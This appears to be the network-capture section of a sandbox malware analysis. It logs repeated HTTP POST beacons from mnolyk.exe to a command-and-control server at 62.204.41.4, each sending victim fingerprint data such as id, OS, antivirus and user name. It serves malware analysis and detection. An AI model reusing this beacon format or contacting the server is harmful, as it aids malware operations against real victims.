                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:00.284821987 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.348800898 CET758INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    559192.168.2.35026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:00.517158031 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.579685926 CET759INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    56192.168.2.34975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:30.574105978 CET257OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.637723923 CET257INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    560192.168.2.35026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:00.750617981 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.814040899 CET760INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    561192.168.2.35026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:01.016917944 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.083281040 CET761INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    562192.168.2.35026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:01.268881083 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.334364891 CET762INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    563192.168.2.35026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:01.503734112 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.570391893 CET763INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    564192.168.2.35026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:01.755474091 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:01.818662882 CET764INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    565192.168.2.35026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:02.000197887 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.066241980 CET765INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    566192.168.2.35026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:02.235624075 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.298657894 CET766INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    567192.168.2.35027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:02.469353914 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.533246040 CET767INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    568192.168.2.35027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:02.703342915 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:02.766514063 CET768INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    569192.168.2.35027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:02.938055992 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.001113892 CET769INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    57192.168.2.34975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:30.808118105 CET258OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.872117996 CET258INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    570192.168.2.35027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:03.177895069 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.244455099 CET770INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    571192.168.2.35027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:03.430516005 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.495460987 CET771INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    572192.168.2.35027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:03.675784111 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.739691019 CET772INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    573192.168.2.35027662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:03.919337988 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:03.984200954 CET773INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    574192.168.2.35027762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:04.178879976 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.245558023 CET774INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    575192.168.2.35027862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:04.426126003 CET774OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:04.490910053 CET775INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
